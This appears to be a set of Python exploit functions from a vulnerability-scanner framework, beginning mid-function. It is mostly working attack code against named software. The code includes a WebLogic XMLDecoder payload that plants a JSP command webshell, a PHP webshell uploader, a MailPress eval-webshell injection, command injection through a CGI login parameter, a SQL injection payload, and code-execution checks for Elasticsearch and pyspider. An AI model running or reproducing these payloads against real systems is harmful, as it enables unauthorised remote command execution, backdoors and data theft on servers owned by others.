if m: return True else: return False else: break except KeyboardInterrupt: break else: return False except: return False
def _verify(self): result = {} headers = { "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0", "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3", "Content-Type": "text/xml" } payload = ''' <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/0bxxl42slk.jsp</string> <void method="println"><string><![CDATA[<% if("hobs7p".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("flag:m36ty4jg"); while((a=in.read(b))!=-1){ out.println(new String(b)); } } %>]]></string></void><void method="close"/> </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope> ''' try: if '://' not in self.url: self.url = 'http://' + self.url url_1 = self.url + '/wls-wsat/CoordinatorPortType11' req.post(url_1, data=payload, headers=headers, timeout=5) url_2 = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami' resp = req.get(url_2, timeout=5) if resp.status_code == 200 and 'flag:m36ty4jg' in resp.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Webshell'] = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami' result['VerifyInfo']['Response'] = resp.content[13:38] except Exception as e: print(e) return self.parse_attack(result)
def poc(url): if not url.startswith("http"): url = "http://" + url if "/" in url: url += '/hotels/booking?execution=e1s2' try: res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers) response = res.text except Exception: response = "" return response
def poc(url): if not url.startswith("http"): url = "http://" + url if "/" in url: url += '/users?page=&size=5' try: res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers) response = res.text except Exception: response = "" return response
def _attack(self): result = {} url = urlparse.urljoin( self.url, 'index.php?do=ajax&view=upload&file_type=big&filename=filename') shell = "Ra<?php $e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));?>" # 在本地新建一个文件 f = open('s.php', 'wb+') f.write(shell) f.flush() f.close() #上传文件 f = open('s.php', 'rb') files = [('filename', ('php.php', f, 'jpg'))] resp = req.post(url, files=files) # 删除本地刚创建的文件 f.close() os.remove('s.php') # 匹配上传后的路径,并访问该路径验证是否上传成功 match = re.findall(r'"(data\\\/uploads\\\/.*?\.php)"', resp.content) if match: url = urlparse.urljoin( self.url, '/' + match[0].replace('\\', '') + '?e=YXNzZXJ0') head = {'Content-Type': 'application/x-www-form-urlencoded'} data = {'pass': '******'} resp = req.post(url, headers=head, data=data) if resp.status_code == 200 and 'poctest' in resp.content: result['FileInfo'] = {} result['FileInfo']['Fileame'] = url result['FileInfo']['Content'] = shell return self.parse_output(result)
def set_new_upload_path(host, path): headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest', } data = { "setting_id": "general", "BasicConfigOptions.workDir": path, "BasicConfigOptions.proxyHost": "", "BasicConfigOptions.proxyPort": "80"} resp = req.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers) if "successfully" in resp.content: return True else: print("[-] Change New Upload Path failed") exit(resp.content)
def poc(url): a = False url = str(url)[7:] url = "http://" + url + ":9200/_search?pretty" try: res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers) #print res.status_code res1 = req.post(url, data=poc_str1, verify=False, timeout=10, headers=headers) response = res.text #print response response1 = res1.text if "2500" in response1 and "uid=" in response: a = True except Exception: response = "" return a
def check_accurate(ip,port): ''' accurate check check if python script can be executed ''' url="http://"+ip+":"+str(port)+"/debug/pyspidervulntest/run" headers={"Content-Type": "application/x-www-form-urlencoded"} data=''' webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print('pyspidervulnerable')&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D ''' try: r=req.post(url=url,data=data,headers=headers,timeout=1) if '"logs": "pyspidervulnerable\\n"' in r.text: return True except Exception: return False return False
def run_cmd(self, cmd): try: headers = { "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" } url = self.url + "/cgi-bin/mainfunction.cgi" data = "action=login&keyPath=%27%0A%2fbin%2f" + cmd + "%0A%27&loginUser=a&loginPwd=a" res = req.post(url=url, data=data, timeout=(10, 15), headers=headers) if res.status_code == 200: return res.text else: return "" except Exception as e: return ""
def _verify(self): result = {} vul_url = self.url + '/celive/live/header.php' payload = { 'xajax': 'LiveMessage', 'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat(" "floor(rand(0)*2),(select md5(233)))a from " "information_schema.tables group by a)b)," "'','','','1','127.0.0.1','2') #" } response = req.post(vul_url, data=payload, timeout=30).content if 'e165421110ba03099a1c0393373c5b43' in response: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url return self.parse_attack(result)
def _attack(self): result = {} flag = ''.join([random.choice(string.digits) for _ in range(8)]) flag_hash = hashlib.md5(flag).hexdigest() exp_url = "wp-content/plugins/mailpress/mp-includes/action.php" post_data = { 'action':'autosave', 'id':'0', 'revision':'-1', 'to_list':'1', 'subject':'<?php echo md5('+flag+'); @eval($_REQUEST[shell]);?>', 'mail_format':'standard', 'autosave':'1' } tmpparse = urlparse.urlparse(self.url) if tmpparse.path != '': self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1] else: self.url = tmpparse.scheme + '://'+ tmpparse.netloc vul_url = self.url + '/' + exp_url base_rep = req.post(vul_url,data=post_data) getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I) tmpid = getid[0].split("'")[1] while int(tmpid) > 0: shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid rep = req.get(shell_url) if flag_hash in rep.content: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);' break return self.parse_output(result)